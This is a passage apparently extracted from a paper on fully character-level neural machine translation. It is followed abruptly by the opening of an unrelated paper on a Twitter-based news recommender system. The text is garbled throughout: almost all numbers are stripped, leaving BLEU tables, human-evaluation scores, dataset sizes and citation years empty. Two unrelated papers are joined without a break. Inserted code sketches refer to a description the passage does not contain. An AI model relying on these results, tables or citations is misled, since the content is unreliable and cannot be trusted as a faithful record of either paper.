closed-vocabulary transla- tion (sennrich et al., ; sennrich et al., ). indeed, subword-level nmt models have been the de-facto state-of-the-art and are now used in a very large-scale industry nmt system to serve millions of users per day (wu et al., ). http://www.statmt.org/wmt /translation -task.html we experiment in two different scenarios: ) a bilin- gual setting where we train a model on data from a single language pair; and ) a multilingual setting where the task is many-to-one translation. we train a single model on data from all four language pairs. hence, our baselines and models are: (a) bilingual bpe bpe: from (firat et al., a) (b) bilingual bpe char: from (chung et al., ) (c) bilingual char char (d) multilingual bpe char (e) multilingual char char we train all the models ourselves other than (a), for which we report the results from firat et al. ( a). we detail the configuration of our models in table and table . . datasets and preprocessing we use all available parallel data on the four lan- guage pairs from wmt’ : de-en, cs-en, fi-en and ru-en. for the bpe char baselines, we only use sentence pairs where the source is no longer than subword symbols. for our char char models, we only use pairs where the source sentence is no longer than characters. for all the language pairs apart from fi-en, we use newstest- as a develop- ment set and newstest- and newstest- as test sets. for fi-en, we use newsdev- and newstest- as development and test sets, respec- tively. we tokenize each corpus using the script from moses. when training bilingual bpe char models, we ex- tract , bpe operations from each of the source and target corpus using a script from sennrich et al. ( ). this gives a source bpe vocabulary of size k− k for each language. . 
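to make the attention-and-decoder description above concrete, here is a minimal sketch of a single-hidden-layer scorer attending over segment embeddings; it is an illustration rather than the authors' implementation, and the attention hidden size is a placeholder.

```python
import torch
import torch.nn as nn

class SegmentAttention(nn.Module):
    """score every source segment embedding against the decoder state and the
    previously generated target character, then form the context vector as the
    softmax-weighted sum of the segments."""
    def __init__(self, seg_dim, dec_dim, emb_dim, att_dim=256):
        super().__init__()
        self.proj = nn.Linear(seg_dim + dec_dim + emb_dim, att_dim)
        self.v = nn.Linear(att_dim, 1, bias=False)

    def forward(self, segments, dec_state, prev_char_emb):
        # segments: (batch, n_seg, seg_dim); dec_state: (batch, dec_dim)
        n_seg = segments.size(1)
        query = torch.cat([dec_state, prev_char_emb], dim=-1)
        query = query.unsqueeze(1).expand(-1, n_seg, -1)          # repeat per segment
        scores = self.v(torch.tanh(self.proj(torch.cat([segments, query], dim=-1))))
        alpha = torch.softmax(scores.squeeze(-1), dim=-1)          # attention weights
        context = torch.bmm(alpha.unsqueeze(1), segments).squeeze(1)
        return context, alpha

att = SegmentAttention(seg_dim=1024, dec_dim=512, emb_dim=128)
ctx, weights = att(torch.randn(2, 20, 1024), torch.randn(2, 512), torch.randn(2, 128))
print(ctx.shape, weights.shape)  # context per example, and one weight per segment
```

a character-level decoder would then feed the context vector, its own hidden state and the previous character embedding into a softmax over the (small) character vocabulary at every step.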
training details each model is trained using stochastic gradient de- scent and adam (kingma and ba, ) with a learning rate of . and minibatch size . train- ing continues until the bleu score on the validation this is unnecessary for char char models, yet was carried out for comparison. https://github.com/moses-smt/mosesdecod er multilingual bpe char char char vocab size , source emb. target emb. conv. filters - - - - - - - pool stride highway layers encoder -layer grus decoder -layer grus table : multilingual model architectures. set stops improving. the norm of the gradient is clipped with a threshold of (pascanu et al., ). all weights are initialized from a uniform distribu- tion [− . , . ]. each model is trained on a single pre- gtx titan x gpu with gb ram. . decoding details as done by chung et al. ( ), a two-layer uni- directional character-level decoder with gru units is used for all our experiments. for decod- ing, we use a beam search algorithm with length- normalization to penalize shorter hypotheses. the beam width is for all models. . training multilingual models task description we train a model on a many-to- one translation task to translate a sentence in any of the four languages (german, czech, finnish and russian) to english. we do not provide a language identifier to the encoder, but merely the sentence itself, encouraging the model to perform language identification on the fly. in addition, by not providing the language identifier, we expect the model to handle intra-sentence code-switching seamlessly. model architecture the multilingual char char model uses slightly more convolutional filters than the bilingual char char model, namely ( - - - - - - - ). otherwise, the archi- tecture remains the same as shown in table . by not changing the size of the encoder and the decoder, we fix the capacity of the core translation module, and only allow the multilingual model to detect more character patterns. similarly, the multilingual bpe char model has the same encoder and decoder as the bilingual bpe char model, but a larger vocabulary. we learn , multilingual bpe operations on the multilingual corpus, resulting in , subwords. see table for the exact configuration of our multilingual models. data scheduling for the multilingual models, an appropriate scheduling of data from different lan- guages is crucial to avoid overfitting to one language too soon. following firat et al. ( a) and firat et al. ( b), each minibatch is balanced, in that the proportion of each language pair in a single mini- batch corresponds to that of the full corpus. with this minibatch scheme, roughly the same number of updates is required to make one full pass over the entire training corpus of each language pair. mini- batches from all language pairs are combined and presented to the model as a single minibatch. see table for the minibatch size for each language pair. de-en cs-en fi-en ru-en corpus size . m . m . m . m minibatch size table : the minibatch size of each language (second row) is proportionate to the number of sentence pairs in each corpus (first row). treatment of cyrillic to facilitate cross-lingual pa- rameter sharing, we convert every cyrillic charac- ter in the russian source corpus to latin alphabet according to iso- . table shows an example of how this conversion may help the multilingual mod- els identify lexemes that are shared across multiple languages. 
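a minimal sketch of this cyrillic-to-latin conversion step is shown below; the mapping covers only the handful of characters needed for the example and is illustrative, not the complete iso transliteration standard.

```python
# illustrative cyrillic-to-latin mapping for a few letters; the full standard
# covers the whole alphabet and is not reproduced here.
CYR_TO_LAT = {
    "а": "a", "к": "k", "л": "l", "о": "o", "ш": "š", "ы": "y",
    "А": "A", "К": "K", "Л": "L", "О": "O", "Ш": "Š", "Ы": "Y",
}

def romanize(text):
    """replace each cyrillic character with its latin counterpart, leaving
    characters outside the mapping (including latin text) untouched."""
    return "".join(CYR_TO_LAT.get(ch, ch) for ch in text)

print(romanize("школа школы"))  # -> "škola školy", matching the czech forms
```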
school schools cs škola školy ru школа школы ru (iso- ) škola školy table : czech and russian words for school and schools, alongside the conversion of russian characters into latin. multilingual bpe for the multilingual bpe char model, multilingual bpe segmentation rules are extracted from a large dataset containing training source corpora of all the language pairs. to ensure the bpe rules are not biased towards one language, setting src trg dev test test de-en (a)∗ bi bpe bpe . . (b) bi bpe char . . . (c) bi char char . . . (d) multi bpe char . . . (e) multi char char . . . cs-en (f)∗ bi bpe bpe . . (g) bi bpe char . . . (h) bi char char . . . (i) multi bpe char . . . (j) multi char char . . . fi-en (k)∗ bi bpe bpe . . (l) bi bpe char . . (m) bi char char . . (n) multi bpe char . . (o) multi char char . . ru-en (p)∗ bi bpe bpe . . (q) bi bpe char . . . (r) bi char char . . . (s) multi bpe char . . . (t) multi char char . . . table : bleu scores of five different models on four language pairs. for each test or development set, the best performing model is shown in bold. (∗) results are taken from (firat et al., a). larger datasets such as czech and german corpora are trimmed such that every corpus contains, ap- proximately, an equal number of characters. quantitative analysis . evaluation with bleu score in this section, we first establish our main hypothe- ses for introducing character-level and multilingual models, and investigate whether our observations support or disagree with our hypotheses. from our empirical results, we want to verify: ( ) if fully character-level translation outperforms subword- level translation, ( ) in which setting and to what extent is multilingual translation beneficial and ( ) if multilingual, character-level translation achieves superior performance to other models. we outline our results with respect to each hypothesis below. ( ) character-level vs. subword-level in a bilin- gual setting, the char char model outperforms both subword-level baselines on de-en (table (a-c)) and cs-en (table (f-h)). on the other two language pairs, it exceeds the bpe bpe model and achieves a similar performance with the bpe char baseline (table (k-m) and (p-r)). we conclude that the proposed character-level model is comparable to or better than both subword-level baselines. meanwhile, in a multilingual setting, the character-level encoder significantly surpasses the subword-level encoder consistently in all the language pairs (table (d-e), (i-j), (n-o) and (s-t)). from this, we conclude that translating at the level of characters allows the model to discover shared constructs between languages more effectively. this also demonstrates that the character-level model is more flexible in assigning model capacity to different language pairs. ( ) multilingual vs. bilingual at the level of char- acters, we note that multilingual translation is indeed strongly beneficial. on the test sets, the multilin- gual character-level model outperforms the single- pair character-level model by . bleu in fi-en (table (m, o)) and . bleu in cs-en (ta- ble (h, j)), while achieving comparable results on de-en and ru-en. at the level of subwords, on the other hand, we do not observe the same degree of performance benefit. the multilingual bpe char model requires much more updates to reach the performance of the bilingual bpe char model (see figure ). this adequacy fluency setting src trg raw (%) stnd. (σ) raw (%) stnd. (σ) de-en (a) bi bpe char . - . . . (b) bi char char . . . . (c) multi char char . 
. . . cs-en (d) bi bpe char . . . - . (e) bi char char . - . . . (f) multi char char . . . . fi-en (g) bi bpe char . - . . - . (h) bi char char . - . . - . (i) multi char char . - . . . ru-en (j) bi bpe char . - . . - . (k) bi char char . . . . (l) multi char char . . . . table : human evaluation results for adequacy and fluency. we present both the averaged raw scores (raw) and the averaged standardized scores (stnd.). standardized adequacy is used to rank the systems and standardized fluency is used to break ties. a positive standardized score should be interpreted as the number of standard deviations above this particular worker’s mean score that this system scored on average. for each language pair, we boldface the best performing model with statistical significance. when there is a tie, we boldface both systems. suggests that learning useful subword segmentation across languages is difficult. ( ) multilingual char char vs. others the mul- tilingual char char model is the best performer in cs-en, fi-en and ru-en (table (j, o, t)), and is the runner-up in de-en (table (e)). the fact that the multilingual char char model outperforms the single-pair models goes to show the parameter efficiency of character-level translation: instead of training n separate models for n language pairs, it is possible to get a better performance with a single multilingual character-level model. . human evaluation it is well known that automatic evaluation met- rics such as bleu encourage reference-like transla- tions and do not fully capture true translation qual- ity (callison-burch, ; graham et al., ). therefore, we also carry out a recently proposed evaluation from graham et al. ( ) where we have human assessors rate both ( ) adequacy; and ( ) flu- ency of each system translation on a scale from to via amazon mechanical turk. adequacy is the degree to which assessors agree that the system translation expresses the meaning of the reference translation. fluency is evaluated using system trans- lation alone without any reference translation. approximately k turkers assessed a single test set ( k sentences in newstest- ) for each system and language pair. each turker conducted a mini- mum of assessments for quality control, and the set of scores generated by each turker was standard- ized to remove any bias in the individual’s scoring strategy. we consider three models (bilingual bpe char, bilingual char char and multilingual char char) for the human evaluation. we leave out the multilingual bpe char model to minimize the number of similar systems to improve the interpretability of the evalu- ation overall. for de-en, we observe that the multilingual char char and bilingual char char models are tied with respect to both adequacy and fluency (ta- ble (b-c)). for cs-en, the multilingual char char and bilingual bpe char models are tied for adequacy. however, the multilingual char char model yields significantly better fluency (table (d, f)). for fi- en and ru-en, the multilingual char char model is tied with the bilingual char char model with respect to adequacy, but significantly outperforms all other models in fluency (table (g-i, j-l)). overall, the improvement in translation quality yielded by the multilingual character-level model mainly comes from fluency. we conjecture that be- cause the english decoder of the multilingual model is tuned in on all the training sentence pairs, it (a) spelling mistakes de ori warum sollten wir nicht freunde sei ? de src warum solltne wir nich freunde sei ? 
en ref why should not we be friends ? bpe char why are we to be friends ? char char why should we not be friends ? (b) rare words de src siebentausendzweihundertvierundfünfzig . en ref seven thousand two hundred fifty four . bpe char fifty-five decline of the seventy . char char seven thousand hundred thousand fifties . (c) morphology de src die zufahrtsstraßen wurden gesperrt , wodurch sich laut cnn lange rückstaus bildeten . en ref the access roads were blocked off , which , according to cnn , caused long tailbacks . bpe char the access roads were locked , which , according to cnn , was long back . char char the access roads were blocked , which looked long backwards , according to cnn . (d) nonce words de src der test ist nun über , aber ich habe keine gute note . es ist wie eine verschlimmbesserung . en ref the test is now over , but i don’t have any good grade . it is like a worsened improvement . bpe char the test is now over , but i do not have a good note . char char the test is now , but i have no good note , it is like a worsening improvement . (e) multilingual multi src bei der metropolitnı́ho výboru pro dopravu für das gebiet der san francisco bay erklärten beamte , der kon- gress könne das problem банкротство доверительного Фонда строительства шоссейных дорог einfach durch erhöhung der kraftstoffsteuer lösen . en ref at the metropolitan transportation commission in the san francisco bay area , officials say congress could very simply deal with the bankrupt highway trust fund by raising gas taxes . bpe char during the metropolitan committee on transport for san francisco bay , officials declared that congress could solve the problem of bankruptcy by increasing the fuel tax bankrupt . char char at the metropolitan committee on transport for the territory of san francisco bay , officials explained that the congress could simply solve the problem of the bankruptcy of the road construction fund by increasing the fuel tax . table : sample translations. for each example, we show the source sentence as src, the human translation as ref, and the translations from the subword-level baseline and our character-level model as bpe char and char char, re- spectively. for (a), the original, uncorrupted source sentence is also shown (ori). the source sentence in (e) contains words in german (in green), czech (in yellow) and russian (in blue). the translations in (a-d) are from the bilingual models, whereas those in (e) are from the multilingual models. becomes a better language model than a bilingual model’s decoder. we leave it for future work to con- firm if this is indeed the case. qualitative analysis in table , we demonstrate our character-level model’s robustness in four translation scenarios from which conventional nmt systems are known to suffer. we also showcase our model’s ability to seamlessly handle intra-sentence code-switching, or mixed utterances from two or more languages. we compare sample translations from the character- level model with those from the subword-level model, which already sidesteps some of the issues associated with word-level translation. with real-world text containing typos and spelling mistakes, the quality of word-based translation would severely drop, as every non-canonical form of a word cannot be represented. on the other hand, a character-level model has a much better chance recovering the original word or sentence. 
indeed, our char char model is robust against a few spelling (f) long-distance dependencies de src der rückgang zusammen mit einem verstärkten sinken der anzahl der hausbesitzer unter jahren könnte dazu führen , dass gartenzentren zehntausende pfund pro jahr verlieren , wenn die heutigen jungen konsumenten nach einer studie der hta , wie in der financial times berichtet , die “ kernaltersgruppe für gartenprodukte ” erreichen . en ref the drop , coupled with a particular decline in the number of homeowners aged under , could result in garden centres losing out on tens of millions of pounds a year when today ’s young consumers reach the “ core gardening age group , ” according to the hta ’s study , which was reported by the financial times . bpe char the decline , together with reinforcing sinks of the number of householders under the age of , could lead to tens of thousands of garden centres losing tens of thousands of pounds a year if today ’s young consumers reach the “ kernel group of gardening products ” according to a study of the hta , as reported in the financial times . char char the decline , together with a reduction in the number of household owners under the age of , may lead to tens of thousands of pounds per year if today ’s young consumers report after a study of the hta , as reported in the financial times , the “ kernal age group for garden products ” . table : in this sample translation, the proposed character-to-character model fails to adequately capture a long-term dependency. mistakes (table (a)). given a long, rare word such as “sieben- tausendzweihundertvierundfünfzig” (seven thou- sand two hundred fifty four) in table (b), the subword-level model segments “siebentausend” as (sieb, ent, aus, end), which results in an inaccurate translation. the character-level model performs bet- ter on these long, concatenative words with ambigu- ous segmentation. we expect a character-level model to handle novel and unseen morphological inflections well. we ob- serve that this is indeed the case, as our char char model correctly understands “gesperrt”, a past par- ticiple form of “sperren” (to block) (table (c)). nonce words are terms coined for a single use. they are not actual words but are constructed in a way that humans can intuitively guess what they mean, such as workoliday and friyay. we construct a few de-en sentence pairs that contain german nonce words (one example shown in table (d)), and observe that the character-level model can in- deed detect salient character patterns and arrive at a correct translation. finally, we evaluate our multilingual models’ ca- pacity to perform intra-sentence code-switching, by giving them as input mixed sentences from multiple languages. the newstest- development datasets for de-en, cs-en and fi-en contain intersecting examples with the same english sentences. we com- pile a list of these sentences in de/cs/fi and their translation in en, and uniformly choose a few sam- ples at random from the english side. words or clauses from different languages are manually inter- mixed to create multilingual sentences. we discover that when given sentences with a high degree of language intermixing, as in ta- ble (e), the multilingual bpe char model fails to seamlessly handle alternation of languages. overall, however, both multilingual models generate reason- able translations. this is possible because we did not provide a language identifier when training our multilingual models. 
as a result, they learned to un- derstand a multilingual sentence and translate it into a coherent english sentence. there are indeed cases where the proposed character-level model fails, and we notice that those are often sentences with long-distance dependencies (see table ). we show supplementary, sample translations in each scenario on a webpage. training and decoding speed on a single titan x gpu, we observe that our char char models are ap- proximately % slower to train than our bpe char baselines when the same batch size was used. our bilingual character-level models can be trained in roughly two weeks. we further note that the bilingual bpe char model can translate , sentences in . minutes while the bilingual char char model requires . minutes (online, not in batch). see table for the exact details. further observations we also note that the mul- https://sites.google.com/site/dl mtc c model time to execute k updates (s) batch size time to decode k sentences (m) fi-en bpe char . . char char . . multi bpe char . . char char . . table : speed comparison. the second column shows the time taken to execute , training updates. the model makes each update after having seen one mini- batch. tilingual models are less prone to overfitting than the bilingual models. this is particularly visible for low-resource language pairs such as fi-en. figure shows the evolution of the fi-en validation bleu scores where the bilingual models overfit rapidly but the multilingual models seem to regularize learning by training simultaneously on other language pairs. figure : multilingual models overfit less than bilingual models on low-resource language pairs. conclusion we propose a fully character-level nmt model that accepts a sequence of characters in the source lan- guage and outputs a sequence of characters in the target language. what is remarkable about this model is the absence of explicitly hard-coded knowl- edge of words and their boundaries, and that the model learns these concepts from a translation task alone. our empirical results show that the fully character-level model performs as well as, or bet- ter than, subword-level translation models. the performance gain is distinctly pronounced in the multilingual many-to-one translation task, where re- sults show that the character-level model can assign model capacities to different languages more effi- ciently than the subword-level models. we observe a particularly large improvement in fi-en transla- tion when the model is trained to translate multiple languages, indicating a positive cross-lingual trans- fer to a low-resource language pair. we discover two main benefits of the multilin- gual character-level model: ( ) it is much more parameter-efficient than the bilingual models; and ( ) it can naturally handle intra-sentence code- switching as a result of the many-to-one transla- tion task. ultimately, we present a case for fully character-level translation: that translation at the level of character is strongly beneficial and should be encouraged more. the repository https://github.com/nyu-dl /dl mt-c c contains the source code and pre- trained models for reproducing the experimental re- sults. in the next stage of this research, we will in- vestigate extending our multilingual many-to-one translation models to perform many-to-many trans- lations, which will allow the decoder, similarly with the encoder, to learn from multiple target languages. furthermore, a more thorough investigation into model architectures and hyperparameters is needed. 
acknowledgements kyunghyun cho thanks the support of ebay, face- book, google (google faculty award, ) and nvidia (nvidia ai lab, - ). this work was partly supported by the samsung advanced in- stitute of technology (deep learning). jason lee was supported by the qualcomm innovation fellow- ship, and thanks david yenicelik and kevin walli- mann for their contribution in designing the qualita- tive analysis. the authors would like to also thank prof. zheng zhang (nyu, shanghai) for fruitful discussions and comments, as well as yvette gra- ham for her help with the human evaluation. finally, the authors thank the action editor and anonymous reviewers for their constructive feedback. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of the international conference on learning represen- tations. chris callison-burch. . fast, cheap, and creative: evaluating translation quality using amazon’s mechan- ical turk. in proceedings of the conference on empirical methods in natural language processing, pages – . kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. a. on the proper- ties of neural machine translation: encoder-decoder approaches. in proceedings of the th workshop on syntax, semantics, and structure in statistical trans- lation, pages – . kyunghyun cho, bart van merriënboer, caglar gulcehre, fethi bougares, holger schwenk, and yoshua ben- gio. b. learning phrase representations using rnn encoder-decoder for statistical machine transla- tion. in proceedings of the empiricial methods in nat- ural language processing, pages – . junyoung chung, kyunghyun cho, and yoshua bengio. . a character-level decoder without explicit seg- mentation for neural machine translation. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . marta r. costa-jussá and josè a. r. fonollosa. . character-based neural machine translation. in pro- ceedings of the th annual meeting of the association for computational linguistics, pages – . ferdinand de saussure. . course in general lin- guistics. orhan firat, kyunghyun cho, and yoshua bengio. a. multi-way, multilingual neural machine trans- lation with a shared attention mechanism. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics, pages – . orhan firat, baskaran sankaran, yaser al-onaizan, fatos t. yarman vural, and kyunghyun cho. b. zero-resource translation with multi-lingual neural machine translation. in proceedings of the con- ference on empirical methods in natural language processing, pages – . dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilingual language processing from bytes. in proceedings of the conference of the north american chapter of the association for computational linguistics, pages – . yvette graham, nitika mathur, and timothy baldwin. . accurate evaluation of segment-level machine translation metrics. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . yvette graham, timothy baldwin, alistair moffat, and justin zobel. . can machine translation systems be evaluated by the crowd alone. natural language engineering, ( ): – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . ray s. jackendoff. . semantic structures, vol- ume . mit press. 
sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in proceed- ings of the rd annual meeting of the association for computational linguistics, pages – . yoon kim, yacine jernite, david sontag, and alexan- der m. rush. . character-aware neural language models. in proceedings of the th aaai conference on artificial intelligence, pages – . diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of the rd international conference for learning repre- sentations. wang ling, isabel trancoso, chris dyer, and alan w. black. . character-based neural machine transla- tion. arxiv preprint arxiv: . . minh-thang luong and christopher d. manning. . achieving open vocabulary neural machine translation with hybrid word-character models. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – . minh-thang luong, hieu pham, and christopher d. manning. . effective approaches to attention- based neural machine translation. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – . razvan pascanu, tomas mikolov, and yoshua bengio. . on the difficulty of training recurrent neural net- works. in proceedings of the th international con- ference on machine learning, pages – . rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in proceedings of the th annual meeting of the association for computational linguis- tics, pages – . rico sennrich, barry haddow, and alexandra birch. . edinburgh neural machine translation systems for wmt . in proceedings of the st conference on machine translation. rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. . training very deep networks. in advances in neural information processing systems, volume , pages – . ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems, volume , pages – . yulia tsvetkov, sunayana sitaram, manaal faruqui, guillaume lample, patrick littell, david mortensen, alan w. black, lori levin, and chris dyer. . polyglot neural language models: a case study in cross-lingual phonetic representation learning. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics, pages – . yonghui wu, mike schuster, zhifeng chen, quoc v. le, mohammad norouzi, wolfgang macherey, maxim krikun, yuan cao, qin gao, klaus macherey, jeff klingner, apurva shah, melvin johnson, xiaobing liu, lukasz kaiser, stephan gouws, yoshikiyo kato, taku kudo, hideto kazawa, keith stevens, george kurian, nishant patil, wei wang, cliff young, jason smith, jason riesa, alex rudnick, oriol vinyals, greg corrado, macduff hughes, and jeffrey dean. . google’s neural machine translation system: bridg- ing the gap between human and machine translation. arxiv preprint arxiv: . . yijun xiao and kyunghyun cho. . efficient character-level document classification by combin- ing convolution and recurrent layers. arxiv preprint arxiv: . . xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classi- fication. in advances in neural information process- ing systems, volume , pages – . 
incorporating popularity in a personalized news recommender system incorporating popularity in a personalized news recommender system nirmal jonnalagedda, susan gauch, kevin labille and sultan alfarhood computer science and computer engineering, university of arkansas, fayetteville, arkansas, united states abstract online news reading has become a widely popular way to read news articles from news sources around the globe. with the enormous amount of news articles available, users are easily overwhelmed by information of little interest to them. news recommender systems help users manage this flood by recommending articles based on user interests rather than presenting articles in order of their occurrence. we present our research on developing personalized news recommendation system with the help of a popular micro-blogging service, “twitter.” news articles are ranked based on the popularity of the article identified from twitter’s public timeline. in addition, users construct profiles based on their interests and news articles are also ranked based on their match to the user profile. by integrating these two approaches, we present a hybrid news recommendation model that recommends interesting news articles to the user based on their popularity as well as their relevance to the user profile. subjects agents and multi-agent systems, world wide web and web science keywords twitter, personalized news recommendation, news recommender systems, user profile introduction owing largely to the ever-increasing volume and sophistication of information on the web, we are able to access an enormous amount of data from around the globe. the downside of this information explosion is that users are often overwhelmed by information of little interest to them. the key challenge for the users is to find relevant information based on their interests. this problem has led to the evolution of recommender systems that help users find the information they need, based on their interests. recommender systems proactively present users with information related to their interests rather than requiring the user to search for, and then filter through, information based on explicit queries. many organizations use recommender systems to recommend various types of products to the user. for example, netflix recommends movies to its users based on the user’s movie ratings compared to other similar users’ ratings. amazon recommends various types of products such as gadgets, books, or movies and pandora radio recommends music based on a user’s past history and preferences. in addition, news recommender systems that recommend news articles from around the globe have become popular. there are many online news services such as google news and yahoo news. however, with plenty of news available, the driving problem is to identify and recommend the most interesting articles to each user so that they are not swamped by irrelevant how to cite this article jonnalagedda et al. ( ), incorporating popularity in a personalized news recommender system. peerj comput. sci. :e ; doi . /peerj-cs. submitted march accepted may published june corresponding author susan gauch, sgauch@uark.edu academic editor jason jung additional information and declarations can be found on page doi . /peerj-cs. copyright jonnalagedda et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:sgauch@uark.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. 
http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ information. these articles should be related to each user interests but also include those news stories that are generating a lot of interest around the globe. news recommender systems are broadly classified into two types, content-based filtering and collaborative filtering. content-based filtering methods are based on the information and attributes of the product that is being recommended. this approach focuses on analyzing user’s past interest to make future recommendations. essentially, it recommends products whose contents are similar to the contents of previously viewed products that the user has rated highly. content-based filtering has some limitations. it can be difficult for the system to learn and understand user preferences from the user’s behavior. however, for some products, it is possible to extract features that have semantic meaning. a popular service that uses this approach is pandora radio that uses the properties of a song or artist in order to select a station that plays music with similar attributes. user feedback is used to refine the station’s results based on whether the user likes or dislikes the song. on the other hand, collaborative filtering is a method based on information about the actions of other users whose preferences are similar to the existing user. this method studies the pattern of other user’s behavior rather than extracting features from the product. the key advantage of this approach is that prior analysis and understanding of the existing data is not required to make recommendations to the user. however, these systems need a large amount of data from various users in order to make recommendations. amazon is a popular service that uses item to item (people who buy ‘x’ also buy ‘y’) collaborative filtering to recommend products based on other user purchases and reviews. other popular examples that use this approach are the social networking sites that recommend new friends, groups and other social connections to the user. in this paper, we develop a hybrid personalized news recommender system that recommends interesting news articles to the user using a micro-blogging service “twitter.” our news recommender system ranks the articles in different ways: ( ) we consider the user’s profile to recommend articles to the user; and ( ) we also consider the article’s popularity with the help of tweets from twitter’s public timeline. this paper presents a novel approach to help users find interesting articles to read by merging the above two methods of selecting articles. the next section reviews the relevant literature followed by a section explaining the design and implementation of the news recommender system. we continue with a section describing the evaluation of our system and a discussion and analysis of the results of the experiments conducted. we conclude with a summary of the research and briefly outline future work. literature review recommender systems recommender systems are widely used to help readers filter through an ever-growing flood of information. these systems implement an information filtering method to select products from a stream of information. also, recommender systems collect data from users explicitly or implicitly and, based on the collected information, create user profiles. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/ the user profiles are then used to generate recommendations. with explicit information collection, the user typically rates items in addition to his regular tasks. for example, in addition to purchasing an item, the user is asked to rate it with one or more stars. however, with implicit information collection, the recommender system monitors the user’s behavior with items during their normal activities. no extra user effort is required. however, the system must infer the user’s preferences from their actions. recommender systems have been considered as a remedy to overcome the information explosion problem and a lot of research effort has been focused on developing highly reliable recommendation techniques. traditional recommender systems are classified based on what information they use and on how they use that information (tuzhilin & adomavicius, ). recommender systems are classified into three categories, based on how the recommendations are made (balabanovic & shoham, ). . content-based recommender systems: these recommender systems recommend an item to the user similar to the ones the user preferred in the past. . collaborative recommender systems: these systems recommend an item to the user based on the people with similar tastes and preferences have liked in the past. they have the advantage that they can recommend items for which little or no semantic information is available (music, movies, books). . hybrid recommender systems: these systems combine both the collaborative and content-based recommendation techniques in order to improve the accuracy of the recommendation. the information gathered from either content-based or collaborative filtering approaches can be used for either memory-based or model-based algorithms. memory- based systems calculate recommendations on-the-go based on the previous user behavior. on the other hand, model-based systems are developed using data mining and machine learning algorithms to find patterns based on training data (su & khoshgoftaar, ). these systems incorporate algorithms such as bayesian networks, clustering models, and semantic models to make predictions for real data from the training model to make recommendations. memory-based systems are easy to implement, work well in real-time, and new data can be added easily and incrementally. however, this technique can become computationally expensive and the performance is affected when data is either sparse or dense. also, these systems are dependent on human ratings and have limited scalability for large datasets. model-based systems better address the scarcity, scalability, and other problems faced by memory-based systems. these systems not only improve the prediction performance but also give and intuitive rationale for recommendations. model-based systems have a more holistic goal to uncover latent factors that explain observed ratings (koren, ). however, the downsides of the model-based systems are expensive model building and loss of useful information caused by dimensionality reduction techniques. some applications implement a hybrid model that fuses both these models to overcome the limitations such as scarcity and loss of information. the goal of these hybrid systems is to jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ improve the prediction performance and to overcome the limitations faced by the model- based and memory-based approaches. 
however, these systems have increased complexity and are expensive to implement (das et al., ). content-based recommender systems content-based recommender systems are based on information about and attributes of the items that are going to be recommended. in other words, these systems recommend items that are similar to those items in which the user has shown interest in the past. the items are recommended based on the comparison between the item contents and user interests. these recommender systems are used in various domains such as web sites, web blogs, restaurants, news articles etc. the user profile is built based on his interests and this profile indicates the type of items that the user likes. several techniques have been implemented to identify the items matching the user profile to make recommendations. most traditional content-based recommender systems depend on features extracted from the content of the items themselves. the features associated with the items are then matched with the user’s profile to make recommendations. this approach is most commonly used by applications whose items have sufficient associated text from which keywords can be extracted. recommendations are done based on the similarity of keywords associated with the items and the keywords associated with the user profile. the user profile’s keywords can be manually supplied (explicit) or identified by mining keywords from items viewed, liked, or purchased by the user (implicit). content-based recommenders primarily use a weighting mechanism to rank the items by assigning weights to the keywords and to differentiate between the items. the keywords are extracted from the contents of the items that the user has shown interest in the past. these keywords form the basis for the user profile. if a user likes an item, the weights of the terms extracted from the item’s content are updated to the weights of the corresponding terms in the user profile. the items recommended in the future are primarily based on the user profile. there are several methods to calculate the weights of the keywords in the content. the most commonly used method is the term frequency - inverse document frequency (tf-idf) method. examples of the earliest traditional content-based recommender systems include (lang, ; krulwich & burkey, ; pazzani, muramatsu & billsus, ). lang ( ) implemented a netnews filtering system, “newsweeder,” that addresses the user profile building problem by letting the user enter his or her interest level for each article being read. the goal of an information filtering system is to sort through large volumes of information and present to the user those documents that are likely to satisfy his or her information requirement. lang ( ) used two approaches tf-idf and minimum description length (mdl) for term weights. two metrics were used to evaluate the performance. one metric was precision that calculated the ratio of relevant documents retrieved to all documents retrieved. the other was the confusion matrix of error generated by text in which the column of the matrix represents the instances in a predicted class, while each row represents the instances in an actual class. he found that mdl approach outperformed the traditional tf-idf approach. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
